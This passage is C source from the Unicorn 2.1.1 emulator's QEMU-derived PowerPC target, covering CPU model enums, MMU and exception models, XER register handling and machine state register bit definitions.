POWERPC_SVR_E500, POWERPC_SVR_8540_v20 = 0x80300020 | POWERPC_SVR_E500, POWERPC_SVR_8540_v21 = 0x80300021 | POWERPC_SVR_E500, POWERPC_SVR_8541_v10 = 0x80720010 | POWERPC_SVR_E500, POWERPC_SVR_8541_v11 = 0x80720011 | POWERPC_SVR_E500, POWERPC_SVR_8541E_v10 = 0x807A0010 | POWERPC_SVR_E500, POWERPC_SVR_8541E_v11 = 0x807A0011 | POWERPC_SVR_E500, POWERPC_SVR_8543_v10 = 0x80320010 | POWERPC_SVR_E500, POWERPC_SVR_8543_v11 = 0x80320011 | POWERPC_SVR_E500, POWERPC_SVR_8543_v20 = 0x80320020 | POWERPC_SVR_E500, POWERPC_SVR_8543_v21 = 0x80320021 | POWERPC_SVR_E500, POWERPC_SVR_8543E_v10 = 0x803A0010 | POWERPC_SVR_E500, POWERPC_SVR_8543E_v11 = 0x803A0011 | POWERPC_SVR_E500, POWERPC_SVR_8543E_v20 = 0x803A0020 | POWERPC_SVR_E500, POWERPC_SVR_8543E_v21 = 0x803A0021 | POWERPC_SVR_E500, POWERPC_SVR_8544_v10 = 0x80340110 | POWERPC_SVR_E500, POWERPC_SVR_8544_v11 = 0x80340111 | POWERPC_SVR_E500, POWERPC_SVR_8544E_v10 = 0x803C0110 | POWERPC_SVR_E500, POWERPC_SVR_8544E_v11 = 0x803C0111 | POWERPC_SVR_E500, POWERPC_SVR_8545_v20 = 0x80310220 | POWERPC_SVR_E500, POWERPC_SVR_8545_v21 = 0x80310221 | POWERPC_SVR_E500, POWERPC_SVR_8545E_v20 = 0x80390220 | POWERPC_SVR_E500, POWERPC_SVR_8545E_v21 = 0x80390221 | POWERPC_SVR_E500, POWERPC_SVR_8547E_v20 = 0x80390120 | POWERPC_SVR_E500, POWERPC_SVR_8547E_v21 = 0x80390121 | POWERPC_SVR_E500, POWERPC_SVR_8548_v10 = 0x80310010 | POWERPC_SVR_E500, POWERPC_SVR_8548_v11 = 0x80310011 | POWERPC_SVR_E500, POWERPC_SVR_8548_v20 = 0x80310020 | POWERPC_SVR_E500, POWERPC_SVR_8548_v21 = 0x80310021 | POWERPC_SVR_E500, POWERPC_SVR_8548E_v10 = 0x80390010 | POWERPC_SVR_E500, POWERPC_SVR_8548E_v11 = 0x80390011 | POWERPC_SVR_E500, POWERPC_SVR_8548E_v20 = 0x80390020 | POWERPC_SVR_E500, POWERPC_SVR_8548E_v21 = 0x80390021 | POWERPC_SVR_E500, POWERPC_SVR_8555_v10 = 0x80710010 | POWERPC_SVR_E500, POWERPC_SVR_8555_v11 = 0x80710011 | POWERPC_SVR_E500, POWERPC_SVR_8555E_v10 = 0x80790010 | POWERPC_SVR_E500, POWERPC_SVR_8555E_v11 = 0x80790011 | POWERPC_SVR_E500, POWERPC_SVR_8560_v10 = 0x80700010 | POWERPC_SVR_E500, POWERPC_SVR_8560_v20 = 0x80700020 | POWERPC_SVR_E500, POWERPC_SVR_8560_v21 = 0x80700021 | POWERPC_SVR_E500, POWERPC_SVR_8567 = 0x80750111 | POWERPC_SVR_E500, POWERPC_SVR_8567E = 0x807D0111 | POWERPC_SVR_E500, POWERPC_SVR_8568 = 0x80750011 | POWERPC_SVR_E500, POWERPC_SVR_8568E = 0x807D0011 | POWERPC_SVR_E500, POWERPC_SVR_8572 = 0x80E00010 | POWERPC_SVR_E500, POWERPC_SVR_8572E = 0x80E80010 | POWERPC_SVR_E500, POWERPC_SVR_8610 = 0x80A00011, POWERPC_SVR_8641 = 0x80900021, POWERPC_SVR_8641D = 0x80900121, }; #endif 
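/*
 * Illustrative sketch, not part of the original header: the POWER server
 * *_BASE values pair with CPU_POWERPC_POWER_SERVER_MASK (0xFFFF0000) so a
 * whole family can be matched while ignoring the stepping in the low PVR
 * bits; e.g. both POWER9 DD1 (0x004E0100) and DD2.0 (0x004E1200) reduce to
 * CPU_POWERPC_POWER9_BASE. The helper name is hypothetical.
 */
#if 0
#if defined(TARGET_PPC64)
static inline bool pvr_is_power9_family(uint32_t pvr)
{
    return (pvr & CPU_POWERPC_POWER_SERVER_MASK) == CPU_POWERPC_POWER9_BASE;
}
#endif
#endif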
unicorn-2.1.1/qemu/target/ppc/cpu-param.h

/* * PowerPC cpu parameters for qemu. * * Copyright (c) 2007 Jocelyn Mayer * SPDX-License-Identifier: LGPL-2.0+ */ #ifndef PPC_CPU_PARAM_H #define PPC_CPU_PARAM_H 1 #ifdef TARGET_PPC64 # define TARGET_LONG_BITS 64 /* * Note that the official physical address space bits is 62-M where M * is implementation dependent. I've not looked up M for the set of * cpus we emulate at the system level. */ #define TARGET_PHYS_ADDR_SPACE_BITS 62 /* * Note that the PPC environment architecture talks about 80 bit virtual * addresses, with segmentation. Obviously that's not all visible to a * single process, which is all we're concerned with here. */ # ifdef TARGET_ABI32 # define TARGET_VIRT_ADDR_SPACE_BITS 32 # else # define TARGET_VIRT_ADDR_SPACE_BITS 64 # endif #else # define TARGET_LONG_BITS 32 # define TARGET_PHYS_ADDR_SPACE_BITS 36 # define TARGET_VIRT_ADDR_SPACE_BITS 32 #endif #define TARGET_PAGE_BITS 12 #define NB_MMU_MODES 10 #endif

unicorn-2.1.1/qemu/target/ppc/cpu-qom.h

/* * QEMU PowerPC CPU * * Copyright (c) 2012 SUSE LINUX Products GmbH * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details.
* * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see * <http://www.gnu.org/licenses/lgpl-2.1.html> */ #ifndef QEMU_PPC_CPU_QOM_H #define QEMU_PPC_CPU_QOM_H #include "hw/core/cpu.h" #ifdef TARGET_PPC64 #define TYPE_POWERPC_CPU "powerpc64-cpu" #else #define TYPE_POWERPC_CPU "powerpc-cpu" #endif #define POWERPC_CPU(obj) ((PowerPCCPU *)obj) #define POWERPC_CPU_CLASS(klass) ((PowerPCCPUClass *)klass) #define POWERPC_CPU_GET_CLASS(obj) (&((PowerPCCPU *)obj)->cc) typedef struct PowerPCCPU PowerPCCPU; typedef struct CPUPPCState CPUPPCState; typedef struct ppc_tb_t ppc_tb_t; typedef struct ppc_dcr_t ppc_dcr_t; /*****************************************************************************/ /* MMU model */ typedef enum powerpc_mmu_t powerpc_mmu_t; enum powerpc_mmu_t { POWERPC_MMU_UNKNOWN = 0x00000000, /* Standard 32 bits PowerPC MMU */ POWERPC_MMU_32B = 0x00000001, /* PowerPC 6xx MMU with software TLB */ POWERPC_MMU_SOFT_6xx = 0x00000002, /* PowerPC 74xx MMU with software TLB */ POWERPC_MMU_SOFT_74xx = 0x00000003, /* PowerPC 4xx MMU with software TLB */ POWERPC_MMU_SOFT_4xx = 0x00000004, /* PowerPC 4xx MMU with software TLB and zones protections */ POWERPC_MMU_SOFT_4xx_Z = 0x00000005, /* PowerPC MMU in real mode only */ POWERPC_MMU_REAL = 0x00000006, /* Freescale MPC8xx MMU model */ POWERPC_MMU_MPC8xx = 0x00000007, /* BookE MMU model */ POWERPC_MMU_BOOKE = 0x00000008, /* BookE 2.06 MMU model */ POWERPC_MMU_BOOKE206 = 0x00000009, /* PowerPC 601 MMU model (specific BATs format) */ POWERPC_MMU_601 = 0x0000000A, #define POWERPC_MMU_64 0x00010000 /* 64 bits PowerPC MMU */ POWERPC_MMU_64B = POWERPC_MMU_64 | 0x00000001, /* Architecture 2.03 and later (has LPCR) */ POWERPC_MMU_2_03 = POWERPC_MMU_64 | 0x00000002, /* Architecture 2.06 variant */ POWERPC_MMU_2_06 = POWERPC_MMU_64 | 0x00000003, /* Architecture 2.07 variant */ POWERPC_MMU_2_07 = POWERPC_MMU_64 | 0x00000004, /* Architecture 3.00 variant */ POWERPC_MMU_3_00 = POWERPC_MMU_64 | 0x00000005, }; /*****************************************************************************/ /* Exception model */ typedef enum powerpc_excp_t powerpc_excp_t; enum powerpc_excp_t { POWERPC_EXCP_UNKNOWN = 0, /* Standard PowerPC exception model */ POWERPC_EXCP_STD, /* PowerPC 40x exception model */ POWERPC_EXCP_40x, /* PowerPC 601 exception model */ POWERPC_EXCP_601, /* PowerPC 602 exception model */ POWERPC_EXCP_602, /* PowerPC 603 exception model */ POWERPC_EXCP_603, /* PowerPC 603e exception model */ POWERPC_EXCP_603E, /* PowerPC G2 exception model */ POWERPC_EXCP_G2, /* PowerPC 604 exception model */ POWERPC_EXCP_604, /* PowerPC 7x0 exception model */ POWERPC_EXCP_7x0, /* PowerPC 7x5 exception model */ POWERPC_EXCP_7x5, /* PowerPC 74xx exception model */ POWERPC_EXCP_74xx, /* BookE exception model */ POWERPC_EXCP_BOOKE, /* PowerPC 970 exception model */ POWERPC_EXCP_970, /* POWER7 exception model */ POWERPC_EXCP_POWER7, /* POWER8 exception model */ POWERPC_EXCP_POWER8, /* POWER9 exception model */ POWERPC_EXCP_POWER9, }; /*****************************************************************************/ /* PM instructions */ typedef enum { PPC_PM_DOZE, PPC_PM_NAP, PPC_PM_SLEEP, PPC_PM_RVWINKLE, PPC_PM_STOP, } powerpc_pm_insn_t; /*****************************************************************************/ /* Input pins model */ typedef enum powerpc_input_t powerpc_input_t; enum powerpc_input_t { PPC_FLAGS_INPUT_UNKNOWN = 0, /* PowerPC 6xx bus */ PPC_FLAGS_INPUT_6xx, /* BookE bus */ PPC_FLAGS_INPUT_BookE, /* 
/*****************************************************************************/
/* Input pins model */
typedef enum powerpc_input_t powerpc_input_t;
enum powerpc_input_t {
    PPC_FLAGS_INPUT_UNKNOWN = 0,
    /* PowerPC 6xx bus */
    PPC_FLAGS_INPUT_6xx,
    /* BookE bus */
    PPC_FLAGS_INPUT_BookE,
    /* PowerPC 405 bus */
    PPC_FLAGS_INPUT_405,
    /* PowerPC 970 bus */
    PPC_FLAGS_INPUT_970,
    /* PowerPC POWER7 bus */
    PPC_FLAGS_INPUT_POWER7,
    /* PowerPC POWER9 bus */
    PPC_FLAGS_INPUT_POWER9,
    /* PowerPC 401 bus */
    PPC_FLAGS_INPUT_401,
    /* Freescale RCPU bus */
    PPC_FLAGS_INPUT_RCPU,
};

typedef struct PPCHash64Options PPCHash64Options;

/**
 * PowerPCCPUClass:
 * @parent_realize: The parent class' realize handler.
 * @parent_reset: The parent class' reset handler.
 *
 * A PowerPC CPU model.
 */
typedef struct PowerPCCPUClass {
    /*< private >*/
    CPUClass parent_class;
    /*< public >*/

    void (*parent_reset)(CPUState *cpu);

    uint32_t pvr;
    bool (*pvr_match)(struct PowerPCCPUClass *pcc, uint32_t pvr);
    uint64_t pcr_mask;      /* Available bits in PCR register */
    uint64_t pcr_supported; /* Bits for supported PowerISA versions */
    uint32_t svr;
    uint64_t insns_flags;
    uint64_t insns_flags2;
    uint64_t msr_mask;
    uint64_t lpcr_mask;     /* Available bits in the LPCR */
    uint64_t lpcr_pm;       /* Power-saving mode Exit Cause Enable bits */
    powerpc_mmu_t mmu_model;
    powerpc_excp_t excp_model;
    powerpc_input_t bus_model;
    uint32_t flags;
    int bfd_mach;
    uint32_t l1_dcache_size, l1_icache_size;
    const PPCHash64Options *hash64_opts;
    struct ppc_radix_page_info *radix_page_info;
    uint32_t lrg_decr_bits;
    int n_host_threads;
    void (*init_proc)(CPUPPCState *env);
    int (*check_pow)(CPUPPCState *env);
    int (*handle_mmu_fault)(PowerPCCPU *cpu, vaddr eaddr, int rwx,
                            int mmu_idx);
    bool (*interrupts_big_endian)(PowerPCCPU *cpu);
} PowerPCCPUClass;

typedef struct PPCTimebase {
    uint64_t guest_timebase;
    int64_t time_of_the_day_ns;
    bool runstate_paused;
} PPCTimebase;

#if 0
extern const VMStateDescription vmstate_ppc_timebase;

#define VMSTATE_PPC_TIMEBASE_V(_field, _state, _version) {            \
    .name       = (stringify(_field)),                                \
    .version_id = (_version),                                         \
    .size       = sizeof(PPCTimebase),                                \
    .vmsd       = &vmstate_ppc_timebase,                              \
    .flags      = VMS_STRUCT,                                         \
    .offset     = vmstate_offset_value(_state, _field, PPCTimebase),  \
}

void cpu_ppc_clock_vm_state_change(void *opaque, int running,
                                   RunState state);
#endif

#endif
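Since this Unicorn fork strips QEMU's QOM object model, the cast macros above are plain C pointer casts (CPUState is the first member of PowerPCCPU, so the casts are layout-safe). A hedged usage sketch, not code from the tree (the function name is hypothetical):

/* Illustration only: retrieving the per-model class from a CPUState. */
void example(CPUState *cs)
{
    PowerPCCPU *cpu = POWERPC_CPU(cs);
    PowerPCCPUClass *pcc = POWERPC_CPU_GET_CLASS(cpu);
    (void)pcc; /* e.g. consult pcc->mmu_model or pcc->excp_model */
}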
unicorn-2.1.1/qemu/target/ppc/cpu.c

/*
 * PowerPC CPU routines for qemu.
 *
 * Copyright (c) 2017 Nikunj A Dadhania, IBM Corporation.
 *
 * This library is free software; you can redistribute it and/or
 * modify it under the terms of the GNU Lesser General Public
 * License as published by the Free Software Foundation; either
 * version 2 of the License, or (at your option) any later version.
 *
 * This library is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
 * Lesser General Public License for more details.
 *
 * You should have received a copy of the GNU Lesser General Public
 * License along with this library; if not, see <http://www.gnu.org/licenses/>.
 */

#include "qemu/osdep.h"
#include "cpu.h"
#include "cpu-models.h"

target_ulong cpu_read_xer(CPUPPCState *env)
{
    if (is_isa300(env)) {
        return env->xer | (env->so << XER_SO) |
            (env->ov << XER_OV) | (env->ca << XER_CA) |
            (env->ov32 << XER_OV32) | (env->ca32 << XER_CA32);
    }

    return env->xer | (env->so << XER_SO) | (env->ov << XER_OV) |
        (env->ca << XER_CA);
}

void cpu_write_xer(CPUPPCState *env, target_ulong xer)
{
    env->so = (xer >> XER_SO) & 1;
    env->ov = (xer >> XER_OV) & 1;
    env->ca = (xer >> XER_CA) & 1;
    /* write all the flags, while reading back check of isa300 */
    env->ov32 = (xer >> XER_OV32) & 1;
    env->ca32 = (xer >> XER_CA32) & 1;
    env->xer = xer & ~((1ul << XER_SO) |
                       (1ul << XER_OV) | (1ul << XER_CA) |
                       (1ul << XER_OV32) | (1ul << XER_CA32));
}
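The SO/OV/CA flags live in separate env fields so translated code can update them cheaply; cpu_write_xer() splits them out of the architectural XER and cpu_read_xer() folds them back in, so a write followed by a read is the identity on the implemented bits. A hedged sketch of that invariant (hypothetical harness, needs <assert.h>):

/* Illustration only: XER round-trip through the split flag fields. */
void xer_round_trip(CPUPPCState *env)
{
    /* SO, CA and a 7-bit byte count in XER_BC */
    target_ulong xer = (1ul << XER_SO) | (1ul << XER_CA) | 0x7f;
    cpu_write_xer(env, xer);
    assert(env->so == 1 && env->ca == 1 && env->ov == 0);
    assert(cpu_read_xer(env) == xer); /* flags are re-composed on read */
}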
unicorn-2.1.1/qemu/target/ppc/cpu.h

/*
 * PowerPC emulation cpu definitions for qemu.
 *
 * Copyright (c) 2003-2007 Jocelyn Mayer
 *
 * This library is free software; you can redistribute it and/or
 * modify it under the terms of the GNU Lesser General Public
 * License as published by the Free Software Foundation; either
 * version 2 of the License, or (at your option) any later version.
 *
 * This library is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
 * Lesser General Public License for more details.
 *
 * You should have received a copy of the GNU Lesser General Public
 * License along with this library; if not, see <http://www.gnu.org/licenses/>.
 */

#ifndef PPC_CPU_H
#define PPC_CPU_H

#include "qemu/int128.h"
#include "exec/cpu-defs.h"
#include "cpu-qom.h"

typedef struct TCGContext TCGContext;

#define TCG_GUEST_DEFAULT_MO 0

#define TARGET_PAGE_BITS_64K 16
#define TARGET_PAGE_BITS_16M 24

#if defined(TARGET_PPC64)
#define PPC_ELF_MACHINE EM_PPC64
#else
#define PPC_ELF_MACHINE EM_PPC
#endif

#define PPC_BIT(bit) (0x8000000000000000ULL >> (bit))
#define PPC_BIT32(bit) (0x80000000 >> (bit))
#define PPC_BIT8(bit) (0x80 >> (bit))
#define PPC_BITMASK(bs, be) ((PPC_BIT(bs) - PPC_BIT(be)) | PPC_BIT(bs))
#define PPC_BITMASK32(bs, be) ((PPC_BIT32(bs) - PPC_BIT32(be)) | \
                               PPC_BIT32(bs))
#define PPC_BITMASK8(bs, be) ((PPC_BIT8(bs) - PPC_BIT8(be)) | PPC_BIT8(bs))
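These macros follow IBM (big-endian) bit numbering, where bit 0 is the most significant bit, which is why they shift a set MSB right. A few worked checks, illustrative only:

/* Illustration only: PPC_BIT() uses IBM bit numbering (bit 0 = MSB). */
_Static_assert(PPC_BIT(0)  == 0x8000000000000000ULL, "bit 0 is the MSB");
_Static_assert(PPC_BIT(63) == 0x0000000000000001ULL, "bit 63 is the LSB");
/* PPC_BITMASK(bs, be) covers bits bs..be inclusive, e.g. the top nibble: */
_Static_assert(PPC_BITMASK(0, 3) == 0xF000000000000000ULL, "bits 0-3");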
/*****************************************************************************/
/* Exception vectors definitions */
enum {
    POWERPC_EXCP_NONE = -1,
    /* The 64 first entries are used by the PowerPC embedded specification */
    POWERPC_EXCP_CRITICAL = 0,  /* Critical input */
    POWERPC_EXCP_MCHECK   = 1,  /* Machine check exception */
    POWERPC_EXCP_DSI      = 2,  /* Data storage exception */
    POWERPC_EXCP_ISI      = 3,  /* Instruction storage exception */
    POWERPC_EXCP_EXTERNAL = 4,  /* External input */
    POWERPC_EXCP_ALIGN    = 5,  /* Alignment exception */
    POWERPC_EXCP_PROGRAM  = 6,  /* Program exception */
    POWERPC_EXCP_FPU      = 7,  /* Floating-point unavailable exception */
    POWERPC_EXCP_SYSCALL  = 8,  /* System call exception */
    POWERPC_EXCP_APU      = 9,  /* Auxiliary processor unavailable */
    POWERPC_EXCP_DECR     = 10, /* Decrementer exception */
    POWERPC_EXCP_FIT      = 11, /* Fixed-interval timer interrupt */
    POWERPC_EXCP_WDT      = 12, /* Watchdog timer interrupt */
    POWERPC_EXCP_DTLB     = 13, /* Data TLB miss */
    POWERPC_EXCP_ITLB     = 14, /* Instruction TLB miss */
    POWERPC_EXCP_DEBUG    = 15, /* Debug interrupt */
    /* Vectors 16 to 31 are reserved */
    POWERPC_EXCP_SPEU     = 32, /* SPE/embedded floating-point unavailable */
    POWERPC_EXCP_EFPDI    = 33, /* Embedded floating-point data interrupt */
    POWERPC_EXCP_EFPRI    = 34, /* Embedded floating-point round interrupt */
    POWERPC_EXCP_EPERFM   = 35, /* Embedded performance monitor interrupt */
    POWERPC_EXCP_DOORI    = 36, /* Embedded doorbell interrupt */
    POWERPC_EXCP_DOORCI   = 37, /* Embedded doorbell critical interrupt */
    POWERPC_EXCP_GDOORI   = 38, /* Embedded guest doorbell interrupt */
    POWERPC_EXCP_GDOORCI  = 39, /* Embedded guest doorbell critical interrupt*/
    POWERPC_EXCP_HYPPRIV  = 41, /* Embedded hypervisor priv instruction */
    /* Vectors 42 to 63 are reserved */
    /* Exceptions defined in the PowerPC server specification */
    POWERPC_EXCP_RESET    = 64, /* System reset exception */
    POWERPC_EXCP_DSEG     = 65, /* Data segment exception */
    POWERPC_EXCP_ISEG     = 66, /* Instruction segment exception */
    POWERPC_EXCP_HDECR    = 67, /* Hypervisor decrementer exception */
    POWERPC_EXCP_TRACE    = 68, /* Trace exception */
    POWERPC_EXCP_HDSI     = 69, /* Hypervisor data storage exception */
    POWERPC_EXCP_HISI     = 70, /* Hypervisor instruction storage exception */
    POWERPC_EXCP_HDSEG    = 71, /* Hypervisor data segment exception */
    POWERPC_EXCP_HISEG    = 72, /* Hypervisor instruction segment exception */
    POWERPC_EXCP_VPU      = 73, /* Vector unavailable exception */
    /* 40x specific exceptions */
    POWERPC_EXCP_PIT      = 74, /* Programmable interval timer interrupt */
    /* 601 specific exceptions */
    POWERPC_EXCP_IO       = 75, /* IO error exception */
    POWERPC_EXCP_RUNM     = 76, /* Run mode exception */
    /* 602 specific exceptions */
    POWERPC_EXCP_EMUL     = 77, /* Emulation trap exception */
    /* 602/603 specific exceptions */
    POWERPC_EXCP_IFTLB    = 78, /* Instruction fetch TLB miss */
    POWERPC_EXCP_DLTLB    = 79, /* Data load TLB miss */
    POWERPC_EXCP_DSTLB    = 80, /* Data store TLB miss */
    /* Exceptions available on most PowerPC */
    POWERPC_EXCP_FPA      = 81, /* Floating-point assist exception */
    POWERPC_EXCP_DABR     = 82, /* Data address breakpoint */
    POWERPC_EXCP_IABR     = 83, /* Instruction address breakpoint */
    POWERPC_EXCP_SMI      = 84, /* System management interrupt */
    POWERPC_EXCP_PERFM    = 85, /* Embedded performance monitor interrupt */
    /* 7xx/74xx specific exceptions */
    POWERPC_EXCP_THERM    = 86, /* Thermal interrupt */
    /* 74xx specific exceptions */
    POWERPC_EXCP_VPUA     = 87, /* Vector assist exception */
    /* 970FX specific exceptions */
    POWERPC_EXCP_SOFTP    = 88, /* Soft patch exception */
    POWERPC_EXCP_MAINT    = 89, /* Maintenance exception */
    /* Freescale embedded cores specific exceptions */
    POWERPC_EXCP_MEXTBR   = 90, /* Maskable external breakpoint */
    POWERPC_EXCP_NMEXTBR  = 91, /* Non maskable external breakpoint */
    POWERPC_EXCP_ITLBE    = 92, /* Instruction TLB error */
    POWERPC_EXCP_DTLBE    = 93, /* Data TLB error */
    /* VSX Unavailable (Power ISA 2.06 and later) */
    POWERPC_EXCP_VSXU     = 94, /* VSX Unavailable */
    POWERPC_EXCP_FU       = 95, /* Facility Unavailable */
    /* Additional ISA 2.06 and later server exceptions */
    POWERPC_EXCP_HV_EMU   = 96, /* HV emulation assistance */
    POWERPC_EXCP_HV_MAINT = 97, /* HMI */
    POWERPC_EXCP_HV_FU    = 98, /* Hypervisor Facility unavailable */
    /* Server doorbell variants */
    POWERPC_EXCP_SDOOR    = 99,
    POWERPC_EXCP_SDOOR_HV = 100,
    /* ISA 3.00 additions */
    POWERPC_EXCP_HVIRT    = 101,
    /* EOL */
    POWERPC_EXCP_NB       = 102,
    /* QEMU exceptions: used internally during code translation */
    POWERPC_EXCP_STOP         = 0x200, /* stop translation */
    POWERPC_EXCP_BRANCH       = 0x201, /* branch instruction */
    /* QEMU exceptions: special cases we want to stop translation */
    POWERPC_EXCP_SYNC         = 0x202, /* context synchronizing instruction */
    POWERPC_EXCP_SYSCALL_USER = 0x203, /* System call in user mode only */
};

/* Exceptions error codes */
enum {
    /* Exception subtypes for POWERPC_EXCP_ALIGN */
    POWERPC_EXCP_ALIGN_FP    = 0x01, /* FP alignment exception */
    POWERPC_EXCP_ALIGN_LST   = 0x02, /* Unaligned mult/extern load/store */
    POWERPC_EXCP_ALIGN_LE    = 0x03, /* Multiple little-endian access */
    POWERPC_EXCP_ALIGN_PROT  = 0x04, /* Access cross protection boundary */
    POWERPC_EXCP_ALIGN_BAT   = 0x05, /* Access cross a BAT/seg boundary */
    POWERPC_EXCP_ALIGN_CACHE = 0x06, /* Impossible dcbz access */
    /* Exception subtypes for POWERPC_EXCP_PROGRAM */
    /* FP exceptions */
    POWERPC_EXCP_FP          = 0x10,
    POWERPC_EXCP_FP_OX       = 0x01, /* FP overflow */
    POWERPC_EXCP_FP_UX       = 0x02, /* FP underflow */
    POWERPC_EXCP_FP_ZX       = 0x03, /* FP divide by zero */
    POWERPC_EXCP_FP_XX       = 0x04, /* FP inexact */
    POWERPC_EXCP_FP_VXSNAN   = 0x05, /* FP invalid SNaN op */
    POWERPC_EXCP_FP_VXISI    = 0x06, /* FP invalid infinite subtraction */
    POWERPC_EXCP_FP_VXIDI    = 0x07, /* FP invalid infinite divide */
    POWERPC_EXCP_FP_VXZDZ    = 0x08, /* FP invalid zero divide */
    POWERPC_EXCP_FP_VXIMZ    = 0x09, /* FP invalid infinite * zero */
    POWERPC_EXCP_FP_VXVC     = 0x0A, /* FP invalid compare */
    POWERPC_EXCP_FP_VXSOFT   = 0x0B, /* FP invalid operation */
    POWERPC_EXCP_FP_VXSQRT   = 0x0C, /* FP invalid square root */
    POWERPC_EXCP_FP_VXCVI    = 0x0D, /* FP invalid integer conversion */
    /* Invalid instruction */
    POWERPC_EXCP_INVAL       = 0x20,
    POWERPC_EXCP_INVAL_INVAL = 0x01, /* Invalid instruction */
    POWERPC_EXCP_INVAL_LSWX  = 0x02, /* Invalid lswx instruction */
    POWERPC_EXCP_INVAL_SPR   = 0x03, /* Invalid SPR access */
    POWERPC_EXCP_INVAL_FP    = 0x04, /* Unimplemented mandatory fp instr */
    /* Privileged instruction */
    POWERPC_EXCP_PRIV        = 0x30,
    POWERPC_EXCP_PRIV_OPC    = 0x01, /* Privileged operation exception */
    POWERPC_EXCP_PRIV_REG    = 0x02, /* Privileged register exception */
    /* Trap */
    POWERPC_EXCP_TRAP        = 0x40,
};
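A program interrupt's error code combines one of the class values (FP, INVAL, PRIV, TRAP) with a subtype in the low bits. A hedged illustration of the composition (the helper is hypothetical, not code from the tree):

/* Illustration only: e.g. a divide-by-zero FP program exception. */
static inline int fp_zx_error_code(void)
{
    return POWERPC_EXCP_FP | POWERPC_EXCP_FP_ZX; /* 0x10 | 0x03 = 0x13 */
}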
#define PPC_INPUT(env) ((env)->bus_model)

/*****************************************************************************/
typedef struct opc_handler_t opc_handler_t;

/*****************************************************************************/
/* Types used to describe some PowerPC registers etc. */
typedef struct DisasContext DisasContext;
typedef struct ppc_spr_t ppc_spr_t;
typedef union ppc_tlb_t ppc_tlb_t;
typedef struct ppc_hash_pte64 ppc_hash_pte64_t;

/* SPR access micro-ops generations callbacks */
struct ppc_spr_t {
    void (*uea_read)(DisasContext *ctx, int gpr_num, int spr_num);
    void (*uea_write)(DisasContext *ctx, int spr_num, int gpr_num);
    void (*oea_read)(DisasContext *ctx, int gpr_num, int spr_num);
    void (*oea_write)(DisasContext *ctx, int spr_num, int gpr_num);
    void (*hea_read)(DisasContext *ctx, int gpr_num, int spr_num);
    void (*hea_write)(DisasContext *ctx, int spr_num, int gpr_num);
    const char *name;
    target_ulong default_value;
#ifdef CONFIG_KVM
    /*
     * We (ab)use the fact that all the SPRs will have ids for the
     * ONE_REG interface will have KVM_REG_PPC to use 0 as meaning,
     * don't sync this
     */
    uint64_t one_reg_id;
#endif
};

/* VSX/Altivec registers (128 bits) */
typedef union _ppc_vsr_t {
    uint8_t u8[16];
    uint16_t u16[8];
    uint32_t u32[4];
    uint64_t u64[2];
    int8_t s8[16];
    int16_t s16[8];
    int32_t s32[4];
    int64_t s64[2];
    float32 f32[4];
    float64 f64[2];
    float128 f128;
#ifdef CONFIG_INT128
    __uint128_t u128;
#endif
    Int128 s128;
} ppc_vsr_t;

typedef ppc_vsr_t ppc_avr_t;
typedef ppc_vsr_t ppc_fprp_t;

/* Software TLB cache */
typedef struct ppc6xx_tlb_t ppc6xx_tlb_t;
struct ppc6xx_tlb_t {
    target_ulong pte0;
    target_ulong pte1;
    target_ulong EPN;
};

typedef struct ppcemb_tlb_t ppcemb_tlb_t;
struct ppcemb_tlb_t {
    uint64_t RPN;
    target_ulong EPN;
    target_ulong PID;
    target_ulong size;
    uint32_t prot;
    uint32_t attr; /* Storage attributes */
};

typedef struct ppcmas_tlb_t {
    uint32_t mas8;
    uint32_t mas1;
    uint64_t mas2;
    uint64_t mas7_3;
} ppcmas_tlb_t;

union ppc_tlb_t {
    ppc6xx_tlb_t *tlb6;
    ppcemb_tlb_t *tlbe;
    ppcmas_tlb_t *tlbm;
};

/* possible TLB variants */
#define TLB_NONE 0
#define TLB_6XX 1
#define TLB_EMB 2
#define TLB_MAS 3

typedef struct PPCHash64SegmentPageSizes PPCHash64SegmentPageSizes;

typedef struct ppc_slb_t ppc_slb_t;
struct ppc_slb_t {
    uint64_t esid;
    uint64_t vsid;
    const PPCHash64SegmentPageSizes *sps;
};

#define MAX_SLB_ENTRIES 64
#define SEGMENT_SHIFT_256M 28
#define SEGMENT_MASK_256M (~((1ULL << SEGMENT_SHIFT_256M) - 1))

#define SEGMENT_SHIFT_1T 40
#define SEGMENT_MASK_1T (~((1ULL << SEGMENT_SHIFT_1T) - 1))

typedef struct ppc_v3_pate_t {
    uint64_t dw0;
    uint64_t dw1;
} ppc_v3_pate_t;

/*****************************************************************************/
/* Machine state register bits definition */
#define MSR_SF 63  /* Sixty-four-bit mode hflags */
#define MSR_TAG 62 /* Tag-active mode (POWERx ?)
*/ #define MSR_ISF 61 /* Sixty-four-bit interrupt mode on 630 */ #define MSR_HV 60 /* hypervisor state hflags */ #define MSR_TS0 34 /* Transactional state, 2 bits (Book3s) */ #define MSR_TS1 33 #define MSR_TM 32 /* Transactional Memory Available (Book3s) */ #define MSR_CM 31 /* Computation mode for BookE hflags */ #define MSR_ICM 30 /* Interrupt computation mode for BookE */ #define MSR_GS 28 /* guest state for BookE */ #define MSR_UCLE 26 /* User-mode cache lock enable for BookE */ #define MSR_VR 25 /* altivec available x hflags */ #define MSR_SPE 25 /* SPE enable for BookE x hflags */ #define MSR_AP 23 /* Access privilege state on 602 hflags */ #define MSR_VSX 23 /* Vector Scalar Extension (ISA 2.06 and later) x hflags */ #define MSR_SA 22 /* Supervisor access mode on 602 hflags */ #define MSR_KEY 19 /* key bit on 603e */ #define MSR_POW 18 /* Power management */ #define MSR_TGPR 17 /* TGPR usage on 602/603 x */ #define MSR_CE 17 /* Critical interrupt enable on embedded PowerPC x */ #define MSR_ILE 16 /* Interrupt little-endian mode */ #define MSR_EE 15 /* External interrupt enable */ #define MSR_PR 14 /* Problem state hflags */ #define MSR_FP 13 /* Floating point available hflags */ #define MSR_ME 12 /* Machine check interrupt enable */ #define MSR_FE0 11 /* Floating point exception mode 0 hflags */ 